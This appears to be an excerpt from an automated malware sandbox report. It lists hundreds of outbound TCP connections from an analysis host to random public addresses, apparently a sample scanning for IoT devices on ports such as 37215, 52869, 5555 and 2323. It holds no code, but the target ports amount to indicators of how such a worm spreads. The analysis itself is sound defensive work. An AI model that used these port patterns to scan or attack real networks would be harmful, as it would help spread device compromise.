                Source: global traffic | TCP traffic: 192.168.2.20:41280 -> 206.186.242.243:52869
                Source: global traffic | TCP traffic: 192.168.2.20:38186 -> 201.254.11.90:8443
                Source: global traffic | TCP traffic: 192.168.2.20:39510 -> 120.148.200.141:8080
                Source: global traffic | TCP traffic: 192.168.2.20:40668 -> 182.58.239.246:49152
                Source: global traffic | TCP traffic: 192.168.2.20:46862 -> 68.124.102.212:52869
                Source: global traffic | TCP traffic: 192.168.2.20:44208 -> 94.194.209.135:7574
                Source: global traffic | TCP traffic: 192.168.2.20:52130 -> 11.202.4.51:37215
                Source: global traffic | TCP traffic: 192.168.2.20:51644 -> 198.228.200.241:5555
                Source: global traffic | TCP traffic: 192.168.2.20:46806 -> 24.29.191.22:52869
                Source: global traffic | TCP traffic: 192.168.2.20:35266 -> 35.119.229.43:8080
                Source: global traffic | TCP traffic: 192.168.2.20:33912 -> 121.130.73.42:8080
                Source: global traffic | TCP traffic: 192.168.2.20:46234 -> 186.54.121.35:5555
                Source: global traffic | TCP traffic: 192.168.2.20:58224 -> 190.127.144.31:7574
                Source: global traffic | TCP traffic: 192.168.2.20:52814 -> 128.70.68.149:7574
                Source: global traffic | TCP traffic: 192.168.2.20:44062 -> 76.44.19.56:8080
                Source: global traffic | TCP traffic: 192.168.2.20:53710 -> 131.221.67.66:5555
                Source: global traffic | TCP traffic: 192.168.2.20:38362 -> 26.221.252.159:8080
                Source: global traffic | TCP traffic: 192.168.2.20:47266 -> 218.184.12.7:52869
                Source: global traffic | TCP traffic: 192.168.2.20:55354 -> 98.38.174.140:8443
                Source: global traffic | TCP traffic: 192.168.2.20:59778 -> 57.122.76.123:8443
                Source: global traffic | TCP traffic: 192.168.2.20:44380 -> 153.254.249.142:8080
                Source: global traffic | TCP traffic: 192.168.2.20:38056 -> 75.81.234.138:81
                Source: global traffic | TCP traffic: 192.168.2.20:57728 -> 205.200.160.114:5555
                Source: global traffic | TCP traffic: 192.168.2.20:43516 -> 82.24.32.9:49152
                Source: global traffic | TCP traffic: 192.168.2.20:42884 -> 195.12.213.244:49152
                Source: global traffic | TCP traffic: 192.168.2.20:49038 -> 3.210.135.11:7574
                Source: global traffic | TCP traffic: 192.168.2.20:52316 -> 162.110.153.1:81
                Source: global traffic | TCP traffic: 192.168.2.20:33986 -> 120.94.211.11:81
                Source: global traffic | TCP traffic: 192.168.2.20:37130 -> 137.170.59.38:8080
                Source: global traffic | TCP traffic: 192.168.2.20:39206 -> 81.4.149.202:81
                Source: global traffic | TCP traffic: 192.168.2.20:60310 -> 23.238.107.169:8080
                Source: global traffic | TCP traffic: 192.168.2.20:40898 -> 171.254.103.135:8443
                Source: global traffic | TCP traffic: 192.168.2.20:48228 -> 7.39.247.208:37215
                Source: global traffic | TCP traffic: 192.168.2.20:54230 -> 125.223.44.138:8080
                Source: global traffic | TCP traffic: 192.168.2.20:34912 -> 146.247.28.72:81
                Source: global traffic | TCP traffic: 192.168.2.20:60270 -> 38.24.144.193:52869
                Source: global traffic | TCP traffic: 192.168.2.20:38266 -> 81.141.9.101:49152
                Source: global traffic | TCP traffic: 192.168.2.20:33558 -> 175.250.213.121:81
                Source: global traffic | TCP traffic: 192.168.2.20:48800 -> 145.144.180.237:7574
                Source: global traffic | TCP traffic: 192.168.2.20:39344 -> 153.76.243.35:5555
                Source: global traffic | TCP traffic: 192.168.2.20:34490 -> 18.106.206.85:8080
                Source: global traffic | TCP traffic: 192.168.2.20:42070 -> 134.169.30.105:8080
                Source: global traffic | TCP traffic: 192.168.2.20:34706 -> 19.144.174.109:7574
                Source: global traffic | TCP traffic: 192.168.2.20:37906 -> 82.65.114.102:37215
                Source: global traffic | TCP traffic: 192.168.2.20:48466 -> 106.15.186.130:81
                Source: global traffic | TCP traffic: 192.168.2.20:57956 -> 139.119.181.153:8080
                Source: global traffic | TCP traffic: 192.168.2.20:59544 -> 216.76.72.47:8080
                Source: global traffic | TCP traffic: 192.168.2.20:46178 -> 86.99.33.243:52869
                Source: global traffic | TCP traffic: 192.168.2.20:43980 -> 63.159.4.132:8443
                Source: global traffic | TCP traffic: 192.168.2.20:46258 -> 220.248.226.183:37215
                Source: global traffic | TCP traffic: 192.168.2.20:55804 -> 26.194.71.217:8080
                Source: global traffic | TCP traffic: 192.168.2.20:53546 -> 220.149.177.74:49152
                Source: global traffic | TCP traffic: 192.168.2.20:53472 -> 105.66.122.27:8080
                Source: global traffic | TCP traffic: 192.168.2.20:38196 -> 89.235.112.28:8080
                Source: global traffic | TCP traffic: 192.168.2.20:59376 -> 29.135.222.49:5555
                Source: global traffic | TCP traffic: 192.168.2.20:49524 -> 208.202.72.240:49152
                Source: global traffic | TCP traffic: 192.168.2.20:41642 -> 165.172.98.68:8080
                Source: global traffic | TCP traffic: 192.168.2.20:54830 -> 53.96.67.14:37215
                Source: global traffic | TCP traffic: 192.168.2.20:47544 -> 133.162.173.63:49152
                Source: global traffic | TCP traffic: 192.168.2.20:33566 -> 215.146.210.187:8080
                Source: global traffic | TCP traffic: 192.168.2.20:37786 -> 141.205.147.62:8443
                Source: global traffic | TCP traffic: 192.168.2.20:34070 -> 41.206.221.126:37215
                Source: global traffic | TCP traffic: 192.168.2.20:44146 -> 213.246.220.122:81
                Source: global traffic | TCP traffic: 192.168.2.20:58358 -> 214.101.231.205:81
                Source: global traffic | TCP traffic: 192.168.2.20:50404 -> 195.47.32.35:8080
                Source: global traffic | TCP traffic: 192.168.2.20:38920 -> 206.85.0.219:8080
                Source: global traffic | TCP traffic: 192.168.2.20:51488 -> 193.139.114.52:8080
                Source: global traffic | TCP traffic: 192.168.2.20:38382 -> 21.39.93.98:8443
                Source: global traffic | TCP traffic: 192.168.2.20:51278 -> 50.74.153.237:52869
                Source: global traffic | TCP traffic: 192.168.2.20:45418 -> 219.2.155.95:5555
                Source: global traffic | TCP traffic: 192.168.2.20:46712 -> 20.162.94.18:7574
                Source: global traffic | TCP traffic: 192.168.2.20:43384 -> 188.213.189.127:8080
                Source: global traffic | TCP traffic: 192.168.2.20:39208 -> 189.5.233.211:52869
                Source: global traffic | TCP traffic: 192.168.2.20:38928 -> 14.134.169.239:37215
                Source: global traffic | TCP traffic: 192.168.2.20:50198 -> 205.163.228.224:8080
                Source: global traffic | TCP traffic: 192.168.2.20:57468 -> 180.194.184.80:37215
                Source: global traffic | TCP traffic: 192.168.2.20:47588 -> 46.184.71.253:81
                Source: global traffic | TCP traffic: 192.168.2.20:57734 -> 166.226.181.7:81
                Source: global traffic | TCP traffic: 192.168.2.20:38664 -> 11.49.92.66:5555
                Source: global traffic | TCP traffic: 192.168.2.20:40490 -> 218.130.134.16:81
                Source: global traffic | TCP traffic: 192.168.2.20:54756 -> 37.137.249.121:7574
                Source: global traffic | TCP traffic: 192.168.2.20:43198 -> 72.80.79.250:52869
                Source: global traffic | TCP traffic: 192.168.2.20:56426 -> 201.84.237.163:52869
                Source: global traffic | TCP traffic: 192.168.2.20:55458 -> 20.162.77.171:37215
                Source: global traffic | TCP traffic: 192.168.2.20:35700 -> 146.179.187.237:5555
                Source: global traffic | TCP traffic: 192.168.2.20:33184 -> 1.212.26.57:52869
                Source: global traffic | TCP traffic: 192.168.2.20:52734 -> 43.26.128.77:8080
                Source: global traffic | TCP traffic: 192.168.2.20:53056 -> 183.59.13.157:8080
                Source: global traffic | TCP traffic: 192.168.2.20:58196 -> 185.217.113.203:81
                Source: global traffic | TCP traffic: 192.168.2.20:47214 -> 180.56.86.107:52869
                Source: global traffic | TCP traffic: 192.168.2.20:50330 -> 158.202.85.201:52869
                Source: global traffic | TCP traffic: 192.168.2.20:38764 -> 11.25.85.171:5555
                Source: global traffic | TCP traffic: 192.168.2.20:40872 -> 123.154.185.48:81
                Source: global traffic | TCP traffic: 192.168.2.20:58848 -> 106.38.123.170:81
                Source: global traffic | TCP traffic: 192.168.2.20:57094 -> 55.5.67.170:7574
                Source: global traffic | TCP traffic: 192.168.2.20:50086 -> 111.83.52.99:52869
                Source: global traffic | TCP traffic: 192.168.2.20:43996 -> 209.98.175.169:8080
                Source: global traffic | TCP traffic: 192.168.2.20:37214 -> 181.240.28.129:8443
                Source: global traffic | TCP traffic: 192.168.2.20:49382 -> 112.127.196.238:52869
                Source: global traffic | TCP traffic: 192.168.2.20:36522 -> 176.84.199.60:7574
                Source: global traffic | TCP traffic: 192.168.2.20:54392 -> 220.240.27.125:81
                Source: global traffic | TCP traffic: 192.168.2.20:47752 -> 44.95.144.199:8443
                Source: global traffic | TCP traffic: 192.168.2.20:43164 -> 57.180.231.50:8080
                Source: global traffic | TCP traffic: 192.168.2.20:51576 -> 162.68.221.250:49152
                Source: global traffic | TCP traffic: 192.168.2.20:55320 -> 151.229.10.158:81
                Source: global traffic | TCP traffic: 192.168.2.20:36522 -> 186.130.183.158:81
                Source: global traffic | TCP traffic: 192.168.2.20:41408 -> 200.95.128.253:5555
                Source: global traffic | TCP traffic: 192.168.2.20:43614 -> 84.154.75.217:8080
                Source: global traffic | TCP traffic: 192.168.2.20:49044 -> 110.105.102.228:8443
                Source: global traffic | TCP traffic: 192.168.2.20:38892 -> 54.24.9.195:37215
                Source: global traffic | TCP traffic: 192.168.2.20:43904 -> 41.201.36.195:81
                Source: global traffic | TCP traffic: 192.168.2.20:59424 -> 11.90.50.158:52869
                Source: global traffic | TCP traffic: 192.168.2.20:35034 -> 136.156.51.131:8080
                Source: global traffic | TCP traffic: 192.168.2.20:43350 -> 144.192.99.206:8443
                Source: global traffic | TCP traffic: 192.168.2.20:43478 -> 222.236.93.57:8443
                Source: global traffic | TCP traffic: 192.168.2.20:41992 -> 83.163.237.112:49152
                Source: global traffic | TCP traffic: 192.168.2.20:40334 -> 4.249.179.26:5555
                Source: global traffic | TCP traffic: 192.168.2.20:59764 -> 97.66.52.185:5555
                Source: global traffic | TCP traffic: 192.168.2.20:47564 -> 82.37.108.31:8443
                Source: global traffic | TCP traffic: 192.168.2.20:33110 -> 80.245.8.70:8443
                Source: global traffic | TCP traffic: 192.168.2.20:43298 -> 103.36.247.14:37215
                Source: global traffic | TCP traffic: 192.168.2.20:45520 -> 139.220.80.168:37215
                Source: global traffic | TCP traffic: 192.168.2.20:53474 -> 1.30.247.172:37215
                Source: global traffic | TCP traffic: 192.168.2.20:37520 -> 164.37.235.78:81
                Source: global traffic | TCP traffic: 192.168.2.20:52784 -> 21.186.78.77:7574
                Source: global traffic | TCP traffic: 192.168.2.20:60302 -> 120.211.21.195:8080
                Source: global traffic | TCP traffic: 192.168.2.20:58960 -> 59.213.176.162:8080
                Source: global traffic | TCP traffic: 192.168.2.20:41990 -> 85.191.228.237:8080
                Source: global traffic | TCP traffic: 192.168.2.20:56656 -> 24.178.198.80:7574
                Source: global traffic | TCP traffic: 192.168.2.20:40148 -> 121.189.109.57:52869
                Source: global traffic | TCP traffic: 192.168.2.20:59514 -> 130.214.58.192:5555
                Source: global traffic | TCP traffic: 192.168.2.20:59886 -> 199.4.48.239:8080
                Source: global traffic | TCP traffic: 192.168.2.20:37810 -> 214.108.114.69:52869
                Source: global traffic | TCP traffic: 192.168.2.20:56312 -> 211.86.78.89:8443
                Source: global traffic | TCP traffic: 192.168.2.20:53826 -> 168.246.111.26:37215
                Source: global traffic | TCP traffic: 192.168.2.20:58696 -> 151.76.245.168:8080
                Source: global traffic | TCP traffic: 192.168.2.20:34400 -> 183.132.135.144:49152
                Source: global traffic | TCP traffic: 192.168.2.20:34810 -> 39.174.77.150:49152
                Source: global traffic | TCP traffic: 192.168.2.20:33672 -> 110.112.123.163:81
                Source: global traffic | TCP traffic: 192.168.2.20:44618 -> 126.158.169.237:8080
                Source: global traffic | TCP traffic: 192.168.2.20:52548 -> 43.143.2.136:49152
                Source: global traffic | TCP traffic: 192.168.2.20:60356 -> 108.73.168.86:37215
                Source: global traffic | TCP traffic: 192.168.2.20:58720 -> 20.153.133.142:8080
                Source: global traffic | TCP traffic: 192.168.2.20:43074 -> 108.86.208.185:52869
                Source: global traffic | TCP traffic: 192.168.2.20:49612 -> 201.141.203.203:5555
                Source: global traffic | TCP traffic: 192.168.2.20:40250 -> 37.83.141.67:8443
                Source: global traffic | TCP traffic: 192.168.2.20:36410 -> 93.254.188.46:8080
                Source: global traffic | TCP traffic: 192.168.2.20:38756 -> 182.107.20.15:5555
                Source: global traffic | TCP traffic: 192.168.2.20:33700 -> 36.78.245.121:8443
                Source: global traffic | TCP traffic: 192.168.2.20:47664 -> 143.210.194.129:5555
                Source: global traffic | TCP traffic: 192.168.2.20:38780 -> 146.149.143.40:37215
                Source: global traffic | TCP traffic: 192.168.2.20:42408 -> 88.225.182.172:37215
                Source: global traffic | TCP traffic: 192.168.2.20:58168 -> 165.149.217.240:8080
                Source: global traffic | TCP traffic: 192.168.2.20:57044 -> 122.246.229.135:52869
                Source: global traffic | TCP traffic: 192.168.2.20:38482 -> 40.151.66.173:8080
                Source: global traffic | TCP traffic: 192.168.2.20:38784 -> 109.196.110.179:49152
                Source: global traffic | TCP traffic: 192.168.2.20:40494 -> 25.220.37.35:8080
                Source: global traffic | TCP traffic: 192.168.2.20:46290 -> 11.229.75.234:49152
                Source: global traffic | TCP traffic: 192.168.2.20:60136 -> 47.231.230.232:8443
                Source: global traffic | TCP traffic: 192.168.2.20:38042 -> 36.77.151.76:49152
                Source: global traffic | TCP traffic: 192.168.2.20:51616 -> 49.1.7.205:52869
                Source: global traffic | TCP traffic: 192.168.2.20:57454 -> 34.238.197.36:8080
                Source: global traffic | TCP traffic: 192.168.2.20:53350 -> 203.176.16.105:8080
                Source: global traffic | TCP traffic: 192.168.2.20:39722 -> 14.73.117.144:52869
                Source: global traffic | TCP traffic: 192.168.2.20:40782 -> 170.151.103.184:7574
                Source: global traffic | TCP traffic: 192.168.2.20:48258 -> 76.34.194.91:8080
                Source: global trafficTCP traffic: 192.168.2.20:59688 -> 16.65.75.160:52869
                Source: global trafficTCP traffic: 192.168.2.20:49042 -> 195.28.214.1:5555
                Source: global trafficTCP traffic: 192.168.2.20:47200 -> 81.85.194.30:8080
                Source: global trafficTCP traffic: 192.168.2.20:56756 -> 86.150.240.234:37215
                Source: global trafficTCP traffic: 192.168.2.20:35898 -> 95.101.120.128:8080
                Source: global trafficTCP traffic: 192.168.2.20:48694 -> 83.81.254.230:7574
                Source: global trafficTCP traffic: 192.168.2.20:45612 -> 60.86.119.144:81
                Source: global trafficTCP traffic: 192.168.2.20:35764 -> 186.119.243.90:49152
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 27.33.40.40:8443
                Source: global trafficTCP traffic: 192.168.2.20:35544 -> 126.61.58.229:37215
                Source: global trafficTCP traffic: 192.168.2.20:33802 -> 200.240.85.208:52869
                Source: global trafficTCP traffic: 192.168.2.20:57480 -> 175.192.25.171:8080
                Source: global trafficTCP traffic: 192.168.2.20:42410 -> 197.44.113.237:8443
                Source: global trafficTCP traffic: 192.168.2.20:43818 -> 191.184.16.254:8080
                Source: global trafficTCP traffic: 192.168.2.20:60776 -> 68.82.30.86:8443
                Source: global trafficTCP traffic: 192.168.2.20:41850 -> 17.74.78.16:8080
                Source: global trafficTCP traffic: 192.168.2.20:57370 -> 19.227.52.166:8443
                Source: global trafficTCP traffic: 192.168.2.20:52122 -> 202.34.135.27:7574
                Source: global trafficTCP traffic: 192.168.2.20:43226 -> 198.50.156.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:53640 -> 123.237.248.195:52869
                Source: global trafficTCP traffic: 192.168.2.20:45910 -> 95.98.64.180:8080
                Source: global trafficTCP traffic: 192.168.2.20:58966 -> 49.245.175.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:51354 -> 29.202.233.5:37215
                Source: global trafficTCP traffic: 192.168.2.20:60896 -> 92.186.8.163:8080
                Source: global trafficTCP traffic: 192.168.2.20:41414 -> 135.228.46.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:40950 -> 174.252.187.249:37215
                Source: global trafficTCP traffic: 192.168.2.20:41290 -> 89.4.36.102:37215
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 149.42.172.25:7574
                Source: global trafficTCP traffic: 192.168.2.20:35888 -> 137.197.44.71:8443
                Source: global trafficTCP traffic: 192.168.2.20:56664 -> 197.181.82.192:52869
                Source: global trafficTCP traffic: 192.168.2.20:57416 -> 174.135.4.19:8080
                Source: global trafficTCP traffic: 192.168.2.20:51356 -> 199.164.2.226:5555
                Source: global trafficTCP traffic: 192.168.2.20:58378 -> 39.8.92.226:8080
                Source: global trafficTCP traffic: 192.168.2.20:35422 -> 222.8.146.13:8443
                Source: global trafficTCP traffic: 192.168.2.20:36822 -> 141.145.10.198:49152
                Source: global trafficTCP traffic: 192.168.2.20:33320 -> 108.77.7.163:49152
                Source: global trafficTCP traffic: 192.168.2.20:33196 -> 16.146.174.98:5555
                Source: global trafficTCP traffic: 192.168.2.20:43882 -> 38.150.249.112:8443
                Source: global trafficTCP traffic: 192.168.2.20:42304 -> 93.175.160.79:52869
                Source: global trafficTCP traffic: 192.168.2.20:42934 -> 179.196.98.226:7574
                Source: global trafficTCP traffic: 192.168.2.20:48398 -> 105.158.147.174:81
                Source: global trafficTCP traffic: 192.168.2.20:39078 -> 149.189.159.233:37215
                Source: global trafficTCP traffic: 192.168.2.20:51686 -> 62.107.94.94:8080
                Source: global trafficTCP traffic: 192.168.2.20:57748 -> 74.208.118.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:56716 -> 182.104.216.147:52869
                Source: global trafficTCP traffic: 192.168.2.20:34106 -> 187.16.231.32:37215
                Source: global trafficTCP traffic: 192.168.2.20:34826 -> 182.157.115.73:49152
                Source: global trafficTCP traffic: 192.168.2.20:50148 -> 186.67.89.101:8080
                Source: global trafficTCP traffic: 192.168.2.20:53370 -> 129.126.74.71:81
                Source: global trafficTCP traffic: 192.168.2.20:46502 -> 36.138.107.187:49152
                Source: global trafficTCP traffic: 192.168.2.20:38782 -> 159.223.77.33:7574
                Source: global trafficTCP traffic: 192.168.2.20:59708 -> 96.210.216.56:8443
                Source: global trafficTCP traffic: 192.168.2.20:54996 -> 101.164.76.184:52869
                Source: global trafficTCP traffic: 192.168.2.20:48852 -> 80.245.214.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:47984 -> 184.106.84.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 111.94.109.213:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 27.245.148.122:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 216.168.246.82:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 4.29.56.116:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 38.107.4.6:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 216.104.95.57:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 47.225.32.191:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 115.172.34.22:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 165.24.244.15:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 110.54.63.53:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 91.89.192.214:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 123.150.242.243:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 156.56.38.42:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 174.28.155.92:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 188.214.50.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 122.55.125.10:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 198.150.168.4:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 14.109.51.21:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 100.177.221.80:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 139.152.15.126:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 47.161.81.172:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 13.63.61.154:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 206.220.228.131:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 93.29.142.216:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 176.45.32.163:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 124.37.144.160:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 63.138.123.177:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 154.144.107.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 85.93.120.215:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 83.206.191.47:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 59.141.175.49:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 170.104.98.24:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 61.90.94.67:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 194.225.68.79:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 24.105.116.75:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 89.162.4.190:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 71.116.155.86:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 174.213.151.13:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 121.175.138.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 195.28.143.84:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 217.111.127.234:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 32.237.238.150:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 54.121.138.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 186.206.2.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 125.45.118.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 147.237.210.54:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 217.98.141.9:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 2.69.114.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 8.78.234.102:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 76.102.146.7:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 31.225.215.251:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 46.166.183.35:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 71.226.140.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 179.1.27.195:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 178.103.96.49:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 209.50.36.159:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 70.77.125.153:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 203.140.50.39:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 36.107.62.85:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 167.143.118.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 81.90.71.55:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 114.149.31.119:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 45.18.116.249:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 40.170.168.4:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 70.44.30.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 73.168.135.102:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 62.29.193.16:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 105.88.240.95:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 63.188.38.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 219.92.27.198:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 120.99.119.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 40.201.181.241:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 31.196.60.220:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 220.1.153.205:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 133.67.141.167:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 110.164.249.236:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 135.132.147.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 39.82.50.240:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 113.104.218.82:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 171.160.36.48:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 19.191.96.74:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 206.237.149.185:2323
                Source: global trafficTCP traffic: 192.168.2.20:51666 -> 48.38.228.119:37215
                Source: global trafficTCP traffic: 192.168.2.20:55084 -> 171.80.64.115:7574
                Source: global trafficTCP traffic: 192.168.2.20:37922 -> 47.112.175.159:8443
                Source: global trafficTCP traffic: 192.168.2.20:39908 -> 44.103.97.78:8080
                Source: global trafficTCP traffic: 192.168.2.20:55610 -> 180.157.38.69:7574
                Source: global trafficTCP traffic: 192.168.2.20:50832 -> 67.224.83.245:8080
                Source: global trafficTCP traffic: 192.168.2.20:56492 -> 23.11.95.110:37215
                Source: global trafficTCP traffic: 192.168.2.20:50150 -> 42.186.87.158:52869
                Source: global trafficTCP traffic: 192.168.2.20:53732 -> 123.41.22.146:5555
                Source: global trafficTCP traffic: 192.168.2.20:43170 -> 206.113.172.55:5555
                Source: global trafficTCP traffic: 192.168.2.20:56982 -> 11.161.130.93:7574
                Source: global trafficTCP traffic: 192.168.2.20:55592 -> 197.241.111.186:7574
                Source: global trafficTCP traffic: 192.168.2.20:43670 -> 17.171.21.221:81
                Source: global trafficTCP traffic: 192.168.2.20:56286 -> 49.162.158.92:7574
                Source: global trafficTCP traffic: 192.168.2.20:44560 -> 58.83.78.135:7574
                Source: global trafficTCP traffic: 192.168.2.20:56802 -> 211.10.41.156:37215
                Source: global trafficTCP traffic: 192.168.2.20:60784 -> 163.5.97.251:81
                Source: global trafficTCP traffic: 192.168.2.20:56348 -> 202.51.68.65:52869
                Source: global trafficTCP traffic: 192.168.2.20:43936 -> 132.125.134.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:33974 -> 125.233.81.181:5555
                Source: global trafficTCP traffic: 192.168.2.20:49644 -> 219.72.130.131:52869
                Source: global trafficTCP traffic: 192.168.2.20:45920 -> 72.48.87.170:81
                Source: global trafficTCP traffic: 192.168.2.20:54482 -> 156.203.51.71:52869
                Source: global trafficTCP traffic: 192.168.2.20:38870 -> 222.89.163.71:52869
                Source: global trafficTCP traffic: 192.168.2.20:54236 -> 67.154.29.99:8080
                Source: global trafficTCP traffic: 192.168.2.20:45226 -> 28.24.68.105:5555
                Source: global trafficTCP traffic: 192.168.2.20:54834 -> 146.106.79.93:49152
                Source: global trafficTCP traffic: 192.168.2.20:34598 -> 129.65.108.24:5555
                Source: global trafficTCP traffic: 192.168.2.20:34120 -> 49.183.251.35:8443
                Source: global trafficTCP traffic: 192.168.2.20:56828 -> 14.131.47.227:52869
                Source: global trafficTCP traffic: 192.168.2.20:56514 -> 154.247.85.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:33082 -> 190.231.42.136:37215
                Source: global trafficTCP traffic: 192.168.2.20:47700 -> 115.18.168.79:8080
                Source: global trafficTCP traffic: 192.168.2.20:38916 -> 71.251.113.238:5555
                Source: global trafficTCP traffic: 192.168.2.20:58026 -> 193.226.141.130:81
                Source: global trafficTCP traffic: 192.168.2.20:50436 -> 152.26.85.31:8443
                Source: global trafficTCP traffic: 192.168.2.20:57174 -> 159.193.139.173:81
                Source: global trafficTCP traffic: 192.168.2.20:57306 -> 40.43.172.11:37215
                Source: global trafficTCP traffic: 192.168.2.20:40524 -> 203.155.149.72:81
                Source: global trafficTCP traffic: 192.168.2.20:40494 -> 5.147.60.12:37215
                Source: global trafficTCP traffic: 192.168.2.20:55674 -> 140.23.32.247:8443
                Source: global trafficTCP traffic: 192.168.2.20:38606 -> 117.167.92.191:52869
                Source: global trafficTCP traffic: 192.168.2.20:35006 -> 124.55.234.220:81
                Source: global trafficTCP traffic: 192.168.2.20:59668 -> 74.232.137.164:5555
                Source: global trafficTCP traffic: 192.168.2.20:50708 -> 207.102.60.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:51106 -> 46.222.134.3:8080
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 51.123.219.80:8443
                Source: global trafficTCP traffic: 192.168.2.20:35768 -> 1.210.9.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:52016 -> 154.57.218.161:49152
                Source: global trafficTCP traffic: 192.168.2.20:42950 -> 37.111.156.94:8080
                Source: global trafficTCP traffic: 192.168.2.20:45136 -> 122.228.67.222:49152
                Source: global trafficTCP traffic: 192.168.2.20:60528 -> 122.243.131.89:7574
                Source: global trafficTCP traffic: 192.168.2.20:48566 -> 210.116.241.219:5555
                Source: global trafficTCP traffic: 192.168.2.20:43386 -> 11.226.128.181:8080
                Source: global trafficTCP traffic: 192.168.2.20:60056 -> 217.125.147.200:5555
                Source: global trafficTCP traffic: 192.168.2.20:40164 -> 220.131.225.243:8080
                Source: global trafficTCP traffic: 192.168.2.20:46268 -> 55.187.88.64:8080
                Source: global trafficTCP traffic: 192.168.2.20:40716 -> 163.36.51.21:5555
                Source: global trafficTCP traffic: 192.168.2.20:54422 -> 64.42.1.11:81
